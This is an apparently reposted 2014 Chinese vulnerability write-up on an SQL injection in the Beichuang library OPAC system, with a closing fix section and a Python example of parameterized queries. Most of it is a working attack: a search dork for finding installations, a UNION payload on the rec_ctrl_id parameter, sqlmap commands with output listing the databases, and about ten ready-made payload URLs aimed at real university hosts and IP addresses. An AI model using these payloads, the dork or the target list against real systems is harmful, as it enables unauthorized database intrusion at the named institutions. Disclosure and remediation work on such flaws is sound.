
SQL injection vulnerability in the 北创 (Beichuang) library OPAC system, part 1

2014-12-12 21:15

Insufficient input filtering at one location in the Beichuang library OPAC system leads to SQL injection; many universities running the product are affected.


Finding instances (Baidu search): inurl:/opac_two/search2

[screenshot: 1.png]

 


Injection URL: /opac_two/search2/shelves_checkout.jsp?library_id= &rec_ctrl_id=

Injectable parameter: rec_ctrl_id
Payload: library_id=A&rec_ctrl_id=0195033665'+and+1=2+union+select+NULL,'111111',NULL,NULL,NULL,NULL,NULL,NULL,NULL-- (backend is MSSQL/Sybase; the `+` signs are URL-encoded spaces)

How the payload works: the single quote closes the string literal that the page builds around rec_ctrl_id, `and 1=2` suppresses the legitimate result row, the UNION appends a row of nine values (the original SELECT returns nine columns) whose second column, '111111', is echoed back in the page, and `--` comments out the closing quote and whatever follows in the original statement.

 

 


Test case: 北京女子学院 (Beijing Women's College), http://219.242.31.130:8080/opac_two/

Test URL: http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665

(1) UNION injection
http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665'+and+1=2+union+select+NULL,'111111',NULL,NULL,NULL,NULL,NULL,NULL,NULL--

[screenshot: 1.png]


(2) Confirmation with sqlmap
 


$ py sqlmap.py -u 'http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665' -p rec_ctrl_id --level 5 --risk 3 --random-agent --dbs -v 1 --batch
---
Place: GET
Parameter: rec_ctrl_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: library_id=A&rec_ctrl_id=0195033665' AND 8430=8430 AND 'LBSb'='LBSb

Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: library_id=A&rec_ctrl_id=0195033665' UNION ALL SELECT NULL,CHAR(113)+CHAR(110)+CHAR(99)+CHAR(112)+CHAR(113)+CHAR(86)+CHAR(102)+CHAR(72)+CHAR(89)+CHAR(

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: library_id=A&rec_ctrl_id=0195033665' AND 8352=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sy
---
[18:13:54] [INFO] testing Microsoft SQL Server
[18:13:54] [INFO] confirming Microsoft SQL Server
[18:14:00] [WARNING] reflective value(s) found and filtering out
[18:14:10] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server Unknown
[18:14:14] [INFO] fetching database names
available databases [6]:
[*] master
[*] melinets
[*] model
[*] sybsystemdb
[*] sybsystemprocs
[*] tempdb

 

[screenshot: 2.png]

 


Other test cases (same MSSQL-style backend). Note that the database list above contains sybsystemdb and sybsystemprocs, which are Sybase ASE system databases, so the backend is most likely Sybase ASE rather than Microsoft SQL Server; sqlmap fingerprints the two together because they share the TDS protocol and T-SQL dialect, and the UNION payload is identical on both.

(1) http://opac.lnu.edu.cn/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

[screenshot: 1.png]


py sqlmap.py -u 'http://opac.lnu.edu.cn/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665' -p rec_ctrl_id --level 5 --risk 3 --technique=U --union-cols=9 --dbms mssql --dbs --batch

[screenshot: 2.png]


(2) http://202.118.84.134:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

[screenshot: 3.png]

(3) http://219.218.26.4:85/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

[screenshot: 4.png]

(4) http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

[screenshot: 5.png]

(5) http://218.107.150.8/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

[screenshot: 6.png]

(6) http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

[screenshot: 7.png]

(7) http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

[screenshot: 8.png]

(8) http://202.118.84.134:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

[screenshot: 9.png]

(9) http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

[screenshot: 10.png]

(10) http://218.107.150.8/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

[screenshot: 11.png]

 

 

Fix:

Filter the input, and do not rely on filtering alone. Validate library_id and rec_ctrl_id against an allowlist (the values seen here are a short library code and a numeric record control number), and pass them to the database as bound parameters (a JDBC PreparedStatement with `?` placeholders in the JSP) instead of concatenating them into the SQL string, so that a quote, UNION or `--` in the input can only ever be compared as data.
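As an added example of that fix (not code from the page or from the vendor), the following Python models the hardened version of the same lookup against an in-memory SQLite table: an allowlist check in front, and the query itself parameterized so the page's payload is inert even if the check were missing. The table, its columns and the regular expressions are constructed assumptions; on the real JSP the equivalent is a PreparedStatement with `?` placeholders.

```python
import re
import sqlite3

# Constructed minimal table (column names are an assumption); the safe path
# never interprets input as SQL, so the column count no longer matters.
SCHEMA = """
CREATE TABLE shelves (library_id TEXT, rec_ctrl_id TEXT, title TEXT);
INSERT INTO shelves VALUES ('A', '0195033665', 'Sample title');
"""

# Hypothetical allowlists derived from the sample values on the page: a short
# alphanumeric library code and a purely numeric record control number.
LIBRARY_ID_RE = re.compile(r"[A-Za-z0-9]{1,8}")
REC_CTRL_ID_RE = re.compile(r"[0-9]{1,20}")

# The page's payload, used here only to show it is rejected / inert.
PAYLOAD = ("0195033665' and 1=2 union select "
           "NULL,'111111',NULL,NULL,NULL,NULL,NULL,NULL,NULL--")


class InvalidParameter(ValueError):
    """Raised for any request parameter that fails the allowlist."""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def validate(library_id, rec_ctrl_id):
    """First layer: reject anything outside the expected character set
    before it gets anywhere near the database."""
    if not LIBRARY_ID_RE.fullmatch(library_id):
        raise InvalidParameter("library_id")
    if not REC_CTRL_ID_RE.fullmatch(rec_ctrl_id):
        raise InvalidParameter("rec_ctrl_id")
    return library_id, rec_ctrl_id


def shelves_checkout_safe(conn, library_id, rec_ctrl_id):
    """Second layer: bound parameters. The driver sends the values separately
    from the SQL text, so quotes, UNION and '--' in the input are compared as
    data and can never change the statement's structure."""
    sql = "SELECT * FROM shelves WHERE library_id = ? AND rec_ctrl_id = ?"
    return conn.execute(sql, (library_id, rec_ctrl_id)).fetchall()


def lookup(conn, library_id, rec_ctrl_id):
    """Both layers together, the way the JSP should handle the request."""
    return shelves_checkout_safe(conn, *validate(library_id, rec_ctrl_id))


def payload_blocked_by_validation(conn):
    """The allowlist stops the payload at the front door."""
    try:
        lookup(conn, "A", PAYLOAD)
    except InvalidParameter:
        return True
    return False


def payload_inert_when_bound(conn):
    """Even with the allowlist skipped, the bound query treats the payload as
    a (non-matching) record id: no error, no marker row, nothing leaked."""
    return shelves_checkout_safe(conn, "A", PAYLOAD) == []


if __name__ == "__main__":
    db = open_db()
    print("legitimate lookup:", lookup(db, "A", "0195033665"))
    print("payload blocked by validation:", payload_blocked_by_validation(db))
    print("payload inert when bound:", payload_inert_when_bound(db))
```

The two layers are deliberately independent: the allowlist gives a clear error and an audit signal for probing, and the bound parameters mean a gap in the allowlist (a new parameter, a forgotten code path) does not reopen the injection.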

 
Source: www.2cto.com/Article/201412/360403.html

Reads: 186300 | Comments: 0 | Tags: injection, vulnerability
